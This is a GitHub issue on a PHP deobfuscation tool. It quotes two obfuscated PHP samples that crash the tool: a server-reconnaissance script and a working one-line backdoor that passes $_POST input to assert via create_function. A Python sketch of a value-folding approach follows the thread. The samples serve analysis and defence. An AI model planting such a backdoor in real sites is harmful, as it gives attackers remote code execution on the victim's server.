simon816/PHPDeobfuscator

It does not seem to be able to restore system resource-related functions

Closed this issue · 2 comments

The test sample is as follows:

<?php
$x1c = "\x64\151\163k\146\162\145e\x73\160\x61\x63\x65";
$x1d = "\144i\163\x6b_\164o\164a\154\137\x73\160\x61ce";
$x1e = "\x67\145\x74\x63\x77d";
$x1f = "\x67e\164\x65\x6e\166";
$x20 = "\x67\145t\150\157s\x74by\156\x61\155\145";
$x21 = "\x70\150\x70\x5fu\x6e\141\155e";
$x22 = "\x70\x68\x70\166e\162\163\x69\157n";
$x23 = "\163\x70r\x69\x6et\x66";
$x24 = "\163tr\154e\x6e";
$x25 = "\x73y\163\164\x65\155";

echo "\x66\151\147\x62a\x79\x69\154\157\146i\x6cogba<\x62r\076";
$x0d = $x21();

$x10 = $x1e();
$x11 = $x1f("\x53\x45\122\x56\x45\122\x5f\x53O\106\124\x57A\122\105");
$x12 = $x22();
$x13 = $_SERVER['SERVER_NAME'];

$x16 = $x1c($x10);
$x18 = $x1d($x10);

$x1b = @PHP_OS;
echo "\146\x69\x67\142\x61y\x69\x6co\146i\x6c\x6fg\x62\x61\074\142\162\076";
echo "\165n\141\x6d\145 -\141: $x0d<\x62\162\x3e";
echo "os\072 $x1b\x3c\x62\162\x3e";
echo "\160w\x64\x3a $x10<\x62r>";
echo "p\150p\x3a\040$x12\x3c\x62\162>";
echo "\163\x6f\x66\x74\167a\162\x65:\x20$x11\x3c\x62\162>";
echo "\x73\x65r\x76\x65r\x2d\x6e\141\155\145\x3a\x20$x13\074\142\162\076";

These lines are going to throw an error:

$x16 = $x1c($x10);
$x18 = $x1d($x10);

==>
Fatal error: Uncaught PHPDeobfuscator\Exceptions\UnknownValueException:Cannot determine value of node

Another sample:

<?php
$a=@$_POST['aa'];
$bd="base64_decode";
$str="str_replace";
$d=$bd("WVhOelkyRnZibWx0WVdWeWRBPT1pdHN1a2k=");
$d=$str('it','suki',$d);
$d=$str('suki','',$d);
$d=$bd($d);
$d=$str('cao','nima',$d);
$d=$str('nima','',$d);
create_function('',$d($a));
?>

The call create_function('',$d($a)); causes the program to exit abnormally:

Fatal error: Uncaught PHPDeobfuscator\Exceptions\UnknownValueException: Cannot determine value of node in C:\Users\Itsuki\Desktop\php-deobf\src\Utils.php on line 55

PHPDeobfuscator\Exceptions\UnknownValueException: : Cannot determine value of node in C:\Users\Itsuki\Desktop\php-deobf\src\Utils.php on line 55

Call Stack:
    0.0002     399528   1. {main}() PHPDeobfuscator\index.php:0
    0.0019     487640   2. deobfuscate(string(263), string(10), false) PHPDeobfuscator\index.php:29
    0.0364    6293768   3. PHPDeobfuscator\Deobfuscator->deobfuscate(array(10)) PHPDeobfuscator\index.php:16
    0.0369    6316824   4. PhpParser\NodeTraverser->traverse(array(10)) PHPDeobfuscator\src\Deobfuscator.php:110
    0.0369    6316824   5. PhpParser\NodeTraverser->traverseArray(array(10)) PHPDeobfuscator\vendor\nikic\php-parser\lib\PhpParser\NodeTraverser.php:91
    0.0404    6407112   6. PhpParser\NodeTraverser->traverseNode(class PhpParser\Node\Stmt\Expression) PHPDeobfuscator\vendor\nikic\php-parser\lib\PhpParser\NodeTraverser.php:223
    0.0404    6407144   7. PhpParser\NodeTraverser->traverseNode(class PhpParser\Node\Expr\FuncCall) PHPDeobfuscator\vendor\nikic\php-parser\lib\PhpParser\NodeTraverser.php:146
    0.0405    6407272   8. PhpParser\NodeTraverser->traverseArray(array(2)) PHPDeobfuscator\vendor\nikic\php-parser\lib\PhpParser\NodeTraverser.php:114
    0.0405    6407984   9. PhpParser\NodeTraverser->traverseNode(class PhpParser\Node\Arg) PHPDeobfuscator\vendor\nikic\php-parser\lib\PhpParser\NodeTraverser.php:223
    0.0406    6409168  10. PHPDeobfuscator\Reducer\VariableReducer->leaveNode(class PhpParser\Node\Expr\FuncCall) PHPDeobfuscator\vendor\nikic\php-parser\lib\PhpParser\NodeTraverser.php:153
    0.0406    6409264  11. PHPDeobfuscator\Utils::getValue(class PhpParser\Node\Expr\Variable) PHPDeobfuscator\src\Reducer\VariableReducer.php:19
    0.0406    6409264  12. PHPDeobfuscator\Utils::getValueRef(class PhpParser\Node\Expr\Variable) PHPDeobfuscator\src\Utils.php:63

When $a is a normal variable value, it can be restored normally.

$a="phpinfo()";
create_function('',$d($a));  ===> create_function('', assert('phpinfo()'));

$a = $_POST['a'];
create_function('',$d($a));  ===> error. $d can be recognized as assert, but the value of $a cannot be recognized.

The AST for the global variable is as follows:

expr: Expr_ArrayDimFetch(
    var: Expr_Variable(
        name: _POST
    )
)

Perhaps you can use PHP-Parser's prettyPrintExpr($node) to extract it as a string.
Does it need to improve error handling? Could it output what has been restored when an error occurs?

This error seems to be coming from a file, src\Reducer\VariableReducer.php, which is not part of PHPDeobfuscator. Is this something you've added?

Oh, this is a very low-level error. I did not realize it was my own code. I found that it could not restore the variables located in the function parameters, so I wrote VariableReducer.php. I am very sorry for taking up your time.
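The behaviour the issue asks for (fold every value that is statically known and keep a request-derived value such as `$_POST['aa']` symbolic instead of aborting) is shown below as an added example. It is not code from PHPDeobfuscator or from the reporter's VariableReducer.php. The step list is a constructed model of the second sample rather than a real PHP parse, and the names `Unknown`, `fold`, `render` and `deobfuscate` are hypothetical.

```python
import base64

class Unknown:
    """A value only known at run time; keeps its source text for printing."""
    def __init__(self, src):
        self.src = src

# PHP built-ins that are safe to evaluate statically (pure string functions).
PURE = {
    "base64_decode": lambda s: base64.b64decode(s).decode("latin-1"),
    "str_replace": lambda find, repl, subj: subj.replace(find, repl),
}

# Constructed model of the second sample: (target, callee, args).
# Tokens starting with "$" are variables, all others are string literals.
SAMPLE = [
    ("$bd", None, ["base64_decode"]),
    ("$str", None, ["str_replace"]),
    ("$d", "$bd", ["WVhOelkyRnZibWx0WVdWeWRBPT1pdHN1a2k="]),
    ("$d", "$str", ["it", "suki", "$d"]),
    ("$d", "$str", ["suki", "", "$d"]),
    ("$d", "$bd", ["$d"]),
    ("$d", "$str", ["cao", "nima", "$d"]),
    ("$d", "$str", ["nima", "", "$d"]),
]

def lookup(env, tok):
    """Resolve a variable through env; an unassigned one stays symbolic."""
    return env.get(tok, Unknown(tok)) if tok.startswith("$") else tok

def render(fn, vals):
    """Print a call, quoting known strings and echoing unknown expressions."""
    name = fn if isinstance(fn, str) else fn.src
    return "%s(%s)" % (name, ", ".join(
        repr(v) if isinstance(v, str) else v.src for v in vals))

def fold(steps):
    env = {}
    for target, callee, args in steps:
        vals = [lookup(env, a) for a in args]
        fn = lookup(env, callee) if callee else None
        if fn is None:                       # plain assignment
            env[target] = vals[0]
        elif fn in PURE and all(isinstance(v, str) for v in vals):
            env[target] = PURE[fn](*vals)    # everything known: evaluate
        else:                                # unknown input: keep the call
            env[target] = Unknown(render(fn, vals))
    return env

def deobfuscate(a_token):
    env = fold(SAMPLE + [("$a", None, [a_token])])
    return "create_function('', %s);" % render(env["$d"], [env["$a"]])
```
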